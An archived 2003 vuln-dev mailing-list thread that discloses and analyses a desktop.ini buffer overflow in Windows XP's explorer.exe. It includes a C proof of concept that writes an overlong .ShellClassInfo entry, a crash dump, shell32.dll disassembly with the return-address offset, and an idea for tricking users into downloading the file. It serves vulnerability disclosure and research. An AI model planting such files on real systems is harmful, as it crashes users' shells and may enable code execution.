Hi, there: We were able to duplicate what was reported by Kristopher Matthews and aT4r InsaN3. Actually, if you have the following test scenario: File/Dir Explanation C:\ C:\temp\desktop.ini Overflowing text file C:\test directory The c:\temp\desktop.ini is the buffer-overflowing text file. Then, it crashes not only Explorer.exe, but also Internet Explorer.exe, and application programs (it crashed UltraEdit) that use file-open dialog box trying to scan the c:\ hard drive. However, you can do the following safely from a DOS prompt for the directory c:\test Explorer c:\test Of course, you cannot browse C:\test from the Explorer.exe GUI starting with C:\ root directory because of the overflowing c:\temp\desktop.ini file. Actually, I assume the overflowing file, no matter where it is located in the subdirectory, will crash the Explorer.exe starting with any directory higher above the overflowing desktop.ini file. (did not fully test though). Down to the assembly level, this bug lies in the shell32.dll file as such: 7740F3C3 lea eax, [ebp-21Ch] ; full path to the filename \desktop.in 7740F3C9 push eax 7740F3CA push 800h ; should be 400h I believe 7740F3CF lea eax, [ebp-0A1Ch] 7740F3D5 push eax 7740F3D6 push offset a_shellclassinf ; ".ShellClassInfo" 7740F3DB call ds:GetPrivateProfileSectionW When GetPrivateProfileSectionW is called, it assumes the buffer to be as large as two times of 800h. As you can see, the local buffer is only A1C - 21C = 800H for this string. So, it overflows if the desktop.ini contains a long string. MSDN documents the third parameter for GetPrivateProfileSection as such: nSize Specifies the size, in characters, of the buffer pointed to by the lpReturnedString parameter. To be precise, the buffer overflowing structure for this bug is such: | --------------------- A1C ---------| EBP | RET | -----------------> higher address The replaceable RET address is located at (A1C+4)/2 = 510. Due to the size limitation set by the 800H as well as the fact that the overflowing string is converted to Unicode, the chance for executing a malicious code (Unicode exploit code as well as exploitable RET address) is very limited. That is the reason we are documenting it in details here. We do not know how this bug affects shell32.dll files on other Windows versions. With due credits to those who wrote the emails quoted below. Peter Huang http://members.rogers.com/exurity/ -----Original Message----- From: Kristopher Matthews [mailto:krismat_private] Sent: Friday, May 09, 2003 11:43 AM To: 'Ryan Yagatich' Cc: vuln-devat_private Subject: RE: Buffer overflow in Explorer.exe I have tested and duplicated this behavior on a fully patched/updated Windows XP Pro system. 1. The overflow is for that particular key, AFAICT. 1a. It will not work for the root (c:/) directory; explorer.exe does not parse 'desktop.ini' for that directory. It will, however, work for any other directory. 2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It looks for all the world like a standard buffer overflow; I believe a more carefully crafted 'desktop.ini' file could be cause for explorer.exe to unintentionally execute arbitrary code. 3. Download and execute untrusted code? Combine this with any of the other popular expoloits for windows; also, it wouldn't be terribly hard to get a user to download a 'desktop.ini' file to their "My Documents" directory (in the guise, of, say, a folder them, which windows does support; e.g. different background, file layout, etc); bam, whenever they open that directory, explorer crashes. Regards, Kristopher -----Original Message----- From: Ryan Yagatich [mailto:ryanyat_private] Sent: Thursday, May 08, 2003 6:28 PM To: at4rat_private Cc: vuln-devat_private Hi, I don't quite understand the purpose behind this code. It creates a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the contents of [.ShellClassInfo] AAAAAAAAAAAA {x2301} And then terminates? I don't have a windows machine available to really explore this any, but what makes that entry in desktop.ini cause this? Furthermore, is this issue only for that particular key or is it generally just key/excessive parameter/missing value size that is affected? And additionally, you mention that explorer will no longer be able to operate when trying to browse the hard disk, but does this mean globally, or when they try to browse the c:/ drive, or just that particular folder? Please send me more information about this, (even if it references past posts that I have missed) so that I can better understand the severity of this. Espcially since to me, I still see it as someone needing to download and execute untrusted software which causes a system crash, and if that were going to happen there are far worse things that can be done besides creating a small text file. Thanks, Ryan Yagatich ,_____________________________________________________, \ Ryan Yagatich supportat_private \ / Pantek Incorporated (877) LINUX-FIX / \ http://www.pantek.com/security (440) 519-1802 \ / Are your networks secure? Are you certain? / \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\ On Wed, 7 May 2003, aT4r InsaN3 wrote: >This bug allow a malicious an attacker to execute data with privileges of a >user that is browsing the hard disk with explorer. > >tested against winxp SP1 > >example code provided. > <snip> > > strcpy(path,"\\aT4r[at]3WDesign.es Security"); > mkdir(path); > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY); > > strcat(path,"\\desktop.ini"); > bof=fopen(path,"w"); > fputs("[.ShellClassInfo]\n",bof); > memset(evil,'A',BUFF); > fputs(evil,bof); > fclose(bof); <snip> -----Original Message----- From: aT4r InsaN3 [mailto:at4rat_private] Sent: Wednesday, May 07, 2003 3:54 PM To: vuln-devat_private Subject: Buffer overflow in Explorer.exe This bug allow a malicious an attacker to execute data with privileges of a user that is browsing the hard disk with explorer. tested against winxp SP1 example code provided. /* Buffer Overflow in explorer.exe - Proof of Concept Tested only against: Windows XP SP1 Found by aT4rat_private Saludos a: - #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }: - #localhost and #darknet Usage: just execute this file. This code will crash your explorer every time you try to browse your harddisk execute this program again to delete the evil file ;-) (3ec.464): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 edi=000ece90 eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 00410041 ?? ??? 3W Design Security 2003. http://www.3WDesign.es/ */ #include <direct.h> #include <stdio.h> #include <windows.h> #include <sys/stat.h> #define BUFF 2300 void main(){ char path[256]; char evil[BUFF+1]=""; FILE *bof; struct stat st; printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .. ...: \tProof of Concept (aT4rat_private)\t:... .. .\n\n"); strcpy(path,"\\aT4r[at]3WDesign.es Security"); mkdir(path); SetFileAttributes(path,FILE_ATTRIBUTE_READONLY); strcat(path,"\\desktop.ini"); if (stat(path,&st)==0) { remove(path); exit(1);}//just execute this program twice to remote this file :P bof=fopen(path,"w"); fputs("[.ShellClassInfo]\n",bof); memset(evil,'A',BUFF); fputs(evil,bof); fclose(bof); printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path); } _________________________________________________________________ Hipotecas para todos los bolsillos con MSN Money. http://money.msn.es/hipotecas/default.asp
This archive was generated by hypermail 2b30 : Tue May 13 2003 - 10:04:02 PDT